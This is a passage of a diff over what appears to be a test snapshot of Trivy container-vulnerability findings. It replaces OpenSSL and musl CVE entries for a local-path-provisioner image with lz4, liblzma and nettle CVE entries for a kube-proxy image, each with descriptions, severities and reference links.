"https://security.gentoo.org/glsa/202103-03", - "https://security.netapp.com/advisory/ntap-20210326-0006/", - "https://security.netapp.com/advisory/ntap-20210513-0002/", - "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", - "https://ubuntu.com/security/notices/USN-4891-1", - "https://ubuntu.com/security/notices/USN-5038-1", - "https://www.cve.org/CVERecord?id=CVE-2021-3449", - "https://www.debian.org/security/2021/dsa-4875", - "https://www.openssl.org/news/secadv/20210325.txt", + "https://access.redhat.com/security/cve/CVE-2021-3520", + "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", + "https://errata.almalinux.org/8/ALSA-2021-2575.html", + "https://errata.rockylinux.org/RLSA-2021:2575", + "https://github.com/lz4/lz4/pull/972", + "https://linux.oracle.com/cve/CVE-2021-3520.html", + "https://linux.oracle.com/errata/ELSA-2021-2575.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", + "https://security.netapp.com/advisory/ntap-20211104-0005/", + "https://ubuntu.com/security/notices/USN-4968-1", + "https://ubuntu.com/security/notices/USN-4968-2", + "https://www.cve.org/CVERecord?id=CVE-2021-3520", "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpujul2022.html", "https://www.oracle.com/security-alerts/cpuoct2021.html", - "https://www.tenable.com/security/tns-2021-05", - "https://www.tenable.com/security/tns-2021-06", - "https://www.tenable.com/security/tns-2021-09", - "https://www.tenable.com/security/tns-2021-10", ], }, "category": "Vulnerability", - "description": "An OpenSSL TLS server may crash if sent a maliciously crafted renegotiation ClientHello message from a client. If a TLSv1.2 renegotiation ClientHello omits the signature_algorithms extension (where it was present in the initial ClientHello), but includes a signature_algorithms_cert extension then a NULL pointer dereference will result, leading to a crash and a denial of service attack. A server is only vulnerable if it has TLSv1.2 and renegotiation enabled (which is the default configuration). OpenSSL TLS clients are not impacted by this issue. All OpenSSL 1.1.1 versions are affected by this issue. Users of these versions should upgrade to OpenSSL 1.1.1k. OpenSSL 1.0.2 is not impacted by this issue. Fixed in OpenSSL 1.1.1k (Affected 1.1.1-1.1.1j).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "There's a flaw in lz4. An attacker who submits a crafted file to an application linked with lz4 may be able to trigger an integer overflow, leading to calling of memmove() on a negative size argument, causing an out-of-bounds write and/or a crash. The greatest impact of this flaw is to availability, with some potential impact to confidentiality and integrity as well.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: NULL pointer dereference in signature_algorithms processing", + "name": "memory corruption due to an integer overflow bug caused by memmove argument", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-3449", + "value": "https://avd.aquasec.com/nvd/cve-2021-3520", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/1", + "value": "https://access.redhat.com/security/cve/CVE-2021-3520", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/27/2", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1954559", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/3", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3520", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2021/03/28/4", + "value": "https://errata.almalinux.org/8/ALSA-2021-2575.html", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-3449", + "value": "https://errata.rockylinux.org/RLSA-2021:2575", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "value": "https://github.com/lz4/lz4/pull/972", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-772220.pdf", + "value": "https://linux.oracle.com/cve/CVE-2021-3520.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3449", + "value": "https://linux.oracle.com/errata/ELSA-2021-2575.html", }, { "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=fb9fa6b51defd48157eeb207f52181f735d96148", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3520", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-83mx-573x-5rw9", + "value": "https://security.netapp.com/advisory/ntap-20211104-0005/", }, { "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44845", + "value": "https://ubuntu.com/security/notices/USN-4968-1", }, { "type": "URL", - "value": "https://kc.mcafee.com/corporate/index?page=content&id=SB10356", + "value": "https://ubuntu.com/security/notices/USN-4968-2", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2021-3449.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-3520", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2021-9151.html", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2021/08/msg00029.html", + "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/CCBFLLVQVILIVGZMBJL3IXZGKWQISYNP/", + "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", }, + ], + "severity": "HIGH", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-17543", + "installedVersion": "1.8.3-1", + "packageName": "liblz4-1", + "references": [ + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", + "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", + "https://access.redhat.com/security/cve/CVE-2019-17543", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", + "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", + "https://github.com/lz4/lz4/issues/801", + "https://github.com/lz4/lz4/pull/756", + "https://github.com/lz4/lz4/pull/760", + "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", + "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", + "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", + "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", + "https://security.netapp.com/advisory/ntap-20210723-0001/", + "https://www.cve.org/CVERecord?id=CVE-2019-17543", + "https://www.oracle.com//security-alerts/cpujul2021.html", + "https://www.oracle.com/security-alerts/cpuoct2020.html", + ], + }, + "category": "Vulnerability", + "description": "LZ4 before 1.9.2 has a heap-based buffer overflow in LZ4_write32 (related to LZ4_compress_destSize), affecting applications that call LZ4_compress_fast with a large input. (This issue can also lead to data corruption.) NOTE: the vendor states "only a few specific / uncommon usages of the API are at risk."", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "lz4: heap-based buffer overflow in LZ4_write32", + "references": [ { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-3449", + "value": "https://avd.aquasec.com/nvd/cve-2019-17543", }, { "type": "URL", - "value": "https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2021-0013", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00069.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055", + "value": "http://lists.opensuse.org/opensuse-security-announce/2019-10/msg00070.html", }, { "type": "URL", - "value": "https://rustsec.org/advisories/RUSTSEC-2021-0055.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-17543", }, { "type": "URL", - "value": "https://security.FreeBSD.org/advisories/FreeBSD-SA-21:07.openssl.asc", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=15941", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202103-03", + "value": "https://github.com/lz4/lz4/compare/v1.9.1...v1.9.2", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210326-0006/", + "value": "https://github.com/lz4/lz4/issues/801", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210513-0002/", + "value": "https://github.com/lz4/lz4/pull/756", }, { "type": "URL", - "value": "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-openssl-2021-GHY28dJd", + "value": "https://github.com/lz4/lz4/pull/760", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-4891-1", + "value": "https://lists.apache.org/thread.html/25015588b770d67470b7ba7ea49a305d6735dd7f00eabe7d50ec1e17@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5038-1", + "value": "https://lists.apache.org/thread.html/543302d55e2d2da4311994e9b0debdc676bf3fd05e1a2be3407aa2d6@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-3449", + "value": "https://lists.apache.org/thread.html/793012683dc0fa6819b7c2560e6cf990811014c40c7d75412099c357@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.debian.org/security/2021/dsa-4875", + "value": "https://lists.apache.org/thread.html/9ff0606d16be2ab6a81619e1c9e23c3e251756638e36272c8c8b7fa3@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210325.txt", + "value": "https://lists.apache.org/thread.html/f0038c4fab2ee25aee849ebeff6b33b3aa89e07ccfb06b5c87b36316@%3Cissues.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://lists.apache.org/thread.html/f506bc371d4a068d5d84d7361293568f61167d3a1c3e91f0def2d7d3@%3Cdev.arrow.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://lists.apache.org/thread.html/r0fb226357e7988a241b06b93bab065bcea2eb38658b382e485960e26@%3Cissues.kudu.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://lists.apache.org/thread.html/r4068ba81066792f2b4d208b39c4c4713c5d4c79bd8cb6c1904af5720@%3Cissues.kudu.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://lists.apache.org/thread.html/r7bc72200f94298bc9a0e35637f388deb53467ca4b2e2ad1ff66d8960@%3Cissues.kudu.apache.org%3E", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-17543", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-05", + "value": "https://security.netapp.com/advisory/ntap-20210723-0001/", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-06", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-17543", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-09", + "value": "https://www.oracle.com//security-alerts/cpujul2021.html", }, { "type": "URL", - "value": "https://www.tenable.com/security/tns-2021-10", + "value": "https://www.oracle.com/security-alerts/cpuoct2020.html", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.1.1j-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2021-23839", - "installedVersion": "1.1.1g-r0", - "packageName": "libssl1.1", + "fixedVersion": "5.2.4-1+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2022-1271", + "installedVersion": "5.2.4-1", + "packageName": "liblzma5", "references": [ - "https://access.redhat.com/security/cve/CVE-2021-23839", - "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", - "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", - "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", - "https://security.netapp.com/advisory/ntap-20210219-0009/", - "https://www.cve.org/CVERecord?id=CVE-2021-23839", - "https://www.openssl.org/news/secadv/20210216.txt", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuApr2021.html", - "https://www.oracle.com/security-alerts/cpuapr2022.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://access.redhat.com/errata/RHSA-2022:4940", + "https://access.redhat.com/security/cve/CVE-2022-1271", + "https://bugzilla.redhat.com/2073310", + "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", + "https://errata.almalinux.org/9/ALSA-2022-4940.html", + "https://errata.rockylinux.org/RLSA-2022:4940", + "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", + "https://linux.oracle.com/cve/CVE-2022-1271.html", + "https://linux.oracle.com/errata/ELSA-2022-5052.html", + "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", + "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", + "https://security-tracker.debian.org/tracker/CVE-2022-1271", + "https://security.gentoo.org/glsa/202209-01", + "https://security.netapp.com/advisory/ntap-20220930-0006/", + "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", + "https://ubuntu.com/security/notices/USN-5378-1", + "https://ubuntu.com/security/notices/USN-5378-2", + "https://ubuntu.com/security/notices/USN-5378-3", + "https://ubuntu.com/security/notices/USN-5378-4", + "https://www.cve.org/CVERecord?id=CVE-2022-1271", + "https://www.openwall.com/lists/oss-security/2022/04/07/8", ], }, "category": "Vulnerability", - "description": "OpenSSL 1.0.2 supports SSLv2. If a client attempts to negotiate SSLv2 with a server that is configured to support both SSLv2 and more recent SSL and TLS versions then a check is made for a version rollback attack when unpadding an RSA signature. Clients that support SSL or TLS versions greater than SSLv2 are supposed to use a special form of padding. A server that supports greater than SSLv2 is supposed to reject connection attempts from a client where this special form of padding is present, because this indicates that a version rollback has occurred (i.e. both client and server support greater than SSLv2, and yet this is the version that is being requested). The implementation of this padding check inverted the logic so that the connection attempt is accepted if the padding is present, and rejected if it is absent. This means that such as server will accept a connection if a version rollback attack has occurred. Further the server will erroneously reject a connection if a normal SSLv2 connection attempt is made. Only OpenSSL 1.0.2 servers from version 1.0.2s to 1.0.2x are affected by this issue. In order to be vulnerable a 1.0.2 server must: 1) have configured SSLv2 support at compile time (this is off by default), 2) have configured SSLv2 support at runtime (this is off by default), 3) have configured SSLv2 ciphersuites (these are not in the default ciphersuite list) OpenSSL 1.1.1 does not have SSLv2 support and therefore is not vulnerable to this issue. The underlying error is in the implementation of the RSA_padding_check_SSLv23() function. This also affects the RSA_SSLV23_PADDING padding mode used by various other functions. Although 1.1.1 does not support SSLv2 the RSA_padding_check_SSLv23() function still exists, as does the RSA_SSLV23_PADDING padding mode. Applications that directly call that function or use that padding mode will encounter this issue. However since there is no support for the SSLv2 protocol in 1.1.1 this is considered a bug and not a security issue in that version. OpenSSL 1.0.2 is out of support and no longer receiving public updates. Premium support customers of OpenSSL 1.0.2 should upgrade to 1.0.2y. Other users should upgrade to 1.1.1j. Fixed in OpenSSL 1.0.2y (Affected 1.0.2s-1.0.2x).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "An arbitrary file write vulnerability was found in GNU gzip's zgrep utility. When zgrep is applied on the attacker's chosen file name (for example, a crafted file name), this can overwrite an attacker's content to an arbitrary attacker-selected file. This flaw occurs due to insufficient validation when processing filenames with two or more newlines where selected content and the target file names are embedded in crafted multi-line file names. This flaw allows a remote, low privileged attacker to force zgrep to write arbitrary files on the system.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "openssl: incorrect SSLv2 rollback protection", + "name": "arbitrary-file-write vulnerability", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-23839", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-23839", - }, - { - "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-637483.pdf", - }, - { - "type": "URL", - "value": "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=30919ab80a478f2d81f2e9acdcca3fa4740cd547", - }, - { - "type": "URL", - "value": "https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44846", + "value": "https://avd.aquasec.com/nvd/cve-2022-1271", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-23839", + "value": "https://access.redhat.com/errata/RHSA-2022:4940", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20210219-0009/", + "value": "https://access.redhat.com/security/cve/CVE-2022-1271", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-23839", + "value": "https://bugzilla.redhat.com/2073310", }, { "type": "URL", - "value": "https://www.openssl.org/news/secadv/20210216.txt", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2073310", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1271", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuApr2021.html", + "value": "https://errata.almalinux.org/9/ALSA-2022-4940.html", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuapr2022.html", + "value": "https://errata.rockylinux.org/RLSA-2022:4940", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://git.tukaani.org/?p=xz.git;a=commit;h=69d1b3fc29677af8ade8dc15dba83f0589cb63d6", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": "1.1.24-r10", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2020-28928", - "installedVersion": "1.1.24-r8", - "packageName": "musl", - "references": [ - "http://www.openwall.com/lists/oss-security/2020/11/20/4", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", - "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", - "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", - "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", - "https://musl.libc.org/releases.html", - "https://ubuntu.com/security/notices/USN-5990-1", - "https://www.openwall.com/lists/oss-security/2020/11/20/4", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", - ], - }, - "category": "Vulnerability", - "description": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinations of destination buffer size and source character limit, as demonstrated by an invalid write access (buffer overflow).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": undefined, - "name": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinati ...", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-28928", + "value": "https://linux.oracle.com/cve/CVE-2022-1271.html", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2020/11/20/4", + "value": "https://linux.oracle.com/errata/ELSA-2022-5052.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", + "value": "https://lists.gnu.org/r/bug-gzip/2022-04/msg00011.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-1271", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", + "value": "https://security-tracker.debian.org/tracker/CVE-2022-1271", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", + "value": "https://security.gentoo.org/glsa/202209-01", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", + "value": "https://security.netapp.com/advisory/ntap-20220930-0006/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", + "value": "https://tukaani.org/xz/xzgrep-ZDI-CAN-16587.patch", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", + "value": "https://ubuntu.com/security/notices/USN-5378-1", }, { "type": "URL", - "value": "https://musl.libc.org/releases.html", + "value": "https://ubuntu.com/security/notices/USN-5378-2", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5990-1", + "value": "https://ubuntu.com/security/notices/USN-5378-3", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2020/11/20/4", + "value": "https://ubuntu.com/security/notices/USN-5378-4", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2022-1271", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpuoct2021.html", + "value": "https://www.openwall.com/lists/oss-security/2022/04/07/8", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "1.1.24-r10", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2020-28928", - "installedVersion": "1.1.24-r8", - "packageName": "musl-utils", + "fixedVersion": "3.4.1-1+deb10u1", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-20305", + "installedVersion": "3.4.1-1", + "packageName": "libnettle6", "references": [ - "http://www.openwall.com/lists/oss-security/2020/11/20/4", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", - "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", - "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", - "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", - "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", - "https://musl.libc.org/releases.html", - "https://ubuntu.com/security/notices/USN-5990-1", - "https://www.openwall.com/lists/oss-security/2020/11/20/4", - "https://www.oracle.com//security-alerts/cpujul2021.html", - "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://access.redhat.com/security/cve/CVE-2021-20305", + "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", + "https://linux.oracle.com/cve/CVE-2021-20305.html", + "https://linux.oracle.com/errata/ELSA-2021-1206.html", + "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", + "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", + "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", + "https://security.gentoo.org/glsa/202105-31", + "https://security.netapp.com/advisory/ntap-20211022-0002/", + "https://ubuntu.com/security/notices/USN-4906-1", + "https://www.cve.org/CVERecord?id=CVE-2021-20305", + "https://www.debian.org/security/2021/dsa-4933", ], }, "category": "Vulnerability", - "description": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinations of destination buffer size and source character limit, as demonstrated by an invalid write access (buffer overflow).", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "A flaw was found in Nettle in versions before 3.7.2, where several Nettle signature verification functions (GOST DSA, EDDSA & ECDSA) result in the Elliptic Curve Cryptography point (ECC) multiply function being called with out-of-range scalers, possibly resulting in incorrect results. This flaw allows an attacker to force an invalid signature, causing an assertion failure or possible validation. The highest threat to this vulnerability is to confidentiality, integrity, as well as system availability.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "In musl libc through 1.2.1, wcsnrtombs mishandles particular combinati ...", + "name": "nettle: Out of bounds memory access in signature verification", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2020-28928", + "value": "https://avd.aquasec.com/nvd/cve-2021-20305", }, { "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2020/11/20/4", + "value": "https://access.redhat.com/security/cve/CVE-2021-20305", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-28928", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1942533", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r2134abfe847bea7795f0e53756d10a47e6643f35ab8169df8b8a9eb1@%3Cnotifications.apisix.apache.org%3E", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-20305", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/r90b60cf49348e515257b4950900c1bd3ab95a960cf2469d919c7264e@%3Cnotifications.apisix.apache.org%3E", + "value": "https://linux.oracle.com/cve/CVE-2021-20305.html", }, { "type": "URL", - "value": "https://lists.apache.org/thread.html/ra63e8dc5137d952afc55dbbfa63be83304ecf842d1eab1ff3ebb29e2@%3Cnotifications.apisix.apache.org%3E", + "value": "https://linux.oracle.com/errata/ELSA-2021-1206.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2020/11/msg00050.html", + "value": "https://lists.debian.org/debian-lts-announce/2021/09/msg00008.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/LKQ3RVSMVZNZNO4D65W2CZZ4DMYFZN2Q/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/MQKWVVMAIDAJ7YAA3VVO32BHLDOH2E63/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UW27QVY7ERPTSGKS4KAWE5TU7EJWHKVQ/", + "value": "https://lists.lysator.liu.se/pipermail/nettle-bugs/2021/009457.html", }, { "type": "URL", - "value": "https://musl.libc.org/releases.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-20305", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5990-1", + "value": "https://security.gentoo.org/glsa/202105-31", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2020/11/20/4", + "value": "https://security.netapp.com/advisory/ntap-20211022-0002/", }, { "type": "URL", - "value": "https://www.oracle.com//security-alerts/cpujul2021.html", + "value": 